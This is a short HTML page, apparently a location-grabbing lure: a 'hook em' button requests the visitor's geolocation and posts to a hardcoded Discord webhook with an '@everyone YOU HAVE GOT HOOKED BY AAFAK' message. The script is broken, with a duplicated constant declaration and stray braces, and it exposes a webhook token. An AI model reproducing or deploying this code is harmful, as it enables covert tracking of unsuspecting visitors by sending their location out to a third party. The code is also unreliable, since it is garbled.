<!DOCTYPE html>
<style>
  button {font-size: 20px;}
</style>
<html>
  <head>
    <script>
      function getLocation() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(sendLocation);
        } else {
         
        }
      }

      function sendLocation(position) {
        const lat = position.coords.latitude;
        const long = position.coords.longitude;

        const webhookUrl = "https://discord.com/api/webhooks/1079123558019649567/nkDVf0UnU3RxFfu_PINmCo1v3l4tZDqpC_TAgRgaW43svKnzOB9i47x3nH53hbTDCA6A"; // Replace with your own webhook URL

        const data = {
          content: `@everyone YOU HAVE GOT HOOKED BY AAFAK`
        };
        const data = {
          content: `@everyone YOU HAVE GOT HOOKED BY AAFAK`
        };

        fetch(webhookUrl, {
          method: "POST",
          headers: {
            "Content-Type": "application/json"
          },
          body: JSON.stringify(data)
        })
   
          }

        });
      }
    </script>
  </head>
  <body>
    <button onclick="getLocation()">hook em</button>
  </body>
</html>
